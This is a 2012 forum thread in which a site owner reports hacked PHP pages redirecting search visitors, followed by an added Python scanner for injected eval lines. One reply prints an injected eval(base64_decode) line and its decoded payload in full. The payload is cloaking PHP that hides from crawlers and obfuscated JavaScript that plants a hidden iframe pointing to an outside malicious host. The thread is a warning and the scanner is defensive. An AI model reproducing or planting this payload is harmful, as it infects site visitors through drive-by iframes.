hmmmm hacked

Discussion in 'Security' started by thedarkest1666, Apr 3, 2012.

  1. #1
    OK, so I may have a background in SEO, but hacking is not my bag...

    One of my sites, when you follow a link from Google Organic Search is redirecting to some spammy s**t website.

    Don't know who the wise guy is but the .htaccess file looks intact. How else do these guys get in and what file should I be looking at fixing please?
     
    thedarkest1666, Apr 3, 2012 IP
  2. thedarkest1666

    thedarkest1666 Active Member

    #2
    ...looks like a base64_decode hack to all the php files...
     
    thedarkest1666, Apr 3, 2012 IP
  3. ironmankho

    ironmankho Active Member

    #3
    Beware of Rapidleech script from warez sites and WordPress themes
    ---------------------------------------------------------------------
    Recently my friend installed a Rapidleech script from warez sites and WordPress themes in my absence.
    When I returned after 1 week, I was shocked because my updated version of ESET Smart Security showed me:

    Threat
    JS/Iframe.CP trojan

    Information:
    Connection terminated - quarantined

    on every site.

    When I examined my hosting, every index page of my site had this code added:

    eval(base64_decode('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'));
    So beware, my friends: always check free themes and scripts for eval, otherwise you will be fuc*ked hard and your hosting provider will kick your ass.


    The above code, decoded:

    <?php
    error_reporting(0);
    $bot = FALSE ;
    $ua = $_SERVER['HTTP_USER_AGENT'];
    $botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
    foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
    if (!$bot){
        echo '<script>c=2;i=c-2;if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=['-30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i2i84i-26i-30i-30i-30i66i63i75i58i70i62i75i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i80i75i66i77i62i1i-5i21i66i63i75i58i70i62i-7i76i75i60i22i0i65i77i77i73i19i8i8i58i58i78i60i72i61i74i80i75i63i7i64i72i77i64i62i62i68i76i7i60i72i70i8i61i8i13i9i13i7i73i65i73i24i64i72i22i10i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i22i0i79i66i76i66i59i66i69i66i77i82i19i65i66i61i61i62i71i20i73i72i76i66i77i66i72i71i19i58i59i76i72i69i78i77i62i20i69i62i63i77i19i9i20i77i72i73i19i9i20i0i23i21i8i66i63i75i58i70i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63i78i71i60i77i66i72i71i-7i66i63i75i58i70i62i75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i22i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i77i62i30i69i62i70i62i71i77i1i0i66i63i75i58i70i62i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i76i75i60i0i5i0i65i77i77i73i19i8i8i58i58i78i60i72i61i74i80i75i63i7i64i72i77i64i62i62i68i76i7i60i72i70i8i61i8i13i9i13i7i73i65i73i24i64i72i22i10i0i2i20i63i7i76i77i82i69i62i7i79i66i76i66i59i66i69i66i77i82i22i0i65i66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73i72i76i66i77i66i72i71i22i0i58i59i76i72i69i78i77i62i0i20i63i7i76i77i82i69i62i7i69i62i63i77i22i0i9i0i20i63i7i76i77i82i69i62i7i77i72i73i22i0i9i0i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i80i66i61i77i65i0i5i0i10i9i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i65i62i66i64i65i77i0i5i0i10i9i0i2i20i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i7i58i73i73i62i71i61i28i65i66i69i61i1i63i2i20i-26i-30i-30i86'][0].split('i');md='a';v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;599!=i;i+=1){j=i;s+=r["fromC"+"harCode"](39+1*w[j]);}
    if(f)z=s;e(z);</script>';
    }
    
    ?> 
     
    ironmankho, Apr 3, 2012 IP
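The injected line described in the post above can be located across a site without executing it. The following is an added example, not part of the original thread: it finds `eval(base64_decode('...'))` calls in PHP files and decodes the argument for review only. The function names, the suffix list and the two-file sample site are constructed for illustration; the traits it flags are taken from the decoded payload quoted above.

```python
import base64
import re
import tempfile
from pathlib import Path

# eval(base64_decode('...')) with either quote style and optional whitespace.
INJECT_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)", re.I)
# Traits taken from the decoded payload quoted in the post above.
TRAITS = ("error_reporting(0)", "HTTP_USER_AGENT", "<script")
PHP_SUFFIXES = {".php", ".phtml", ".inc"}  # assumed list of PHP file types


def inspect_source(text):
    """Find injected calls; the payload is decoded for review, never executed."""
    findings = []
    for m in INJECT_RE.finditer(text):
        try:
            decoded = base64.b64decode(m.group(2)).decode("latin-1")
        except ValueError:  # malformed base64: still report the call itself
            decoded = ""
        findings.append({"line": text.count("\n", 0, m.start()) + 1,
                         "traits": [t for t in TRAITS if t in decoded],
                         "preview": decoded[:60]})
    return findings


def scan_tree(root):
    """Map relative path -> findings for every PHP file containing the pattern."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            found = inspect_source(path.read_text(encoding="latin-1"))
            if found:
                hits[str(path.relative_to(root))] = found
    return hits


def demo():
    """Scan a constructed two-file site: one clean page, one with the injected line."""
    payload = "error_reporting(0); $ua = $_SERVER['HTTP_USER_AGENT']; echo '<script></script>';"
    blob = base64.b64encode(payload.encode()).decode()
    with tempfile.TemporaryDirectory() as root:
        Path(root, "about.php").write_text("<?php echo base64_decode('aGVsbG8='); ?>\n")
        Path(root, "index.php").write_text("<?php\neval(base64_decode('%s'));\n?>\n" % blob)
        return scan_tree(root)


if __name__ == "__main__":
    print(demo())
```

A plain `base64_decode()` call without `eval` is not reported, so legitimate uses of the function do not show up as hits.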
  4. ryan_uk

    ryan_uk Illustrious Member

    #4
    A bit more information, mate. Is it a hand-coded site or are you using Wordpress, for example?
     
    ryan_uk, Apr 4, 2012 IP
  5. tiffanywilliams12i2

    tiffanywilliams12i2 Peon

    #5
    Did you update? Check for shells? Backdoors? Logs? There is a lot involved in knowing what happened.
     
    tiffanywilliams12i2, Apr 5, 2012 IP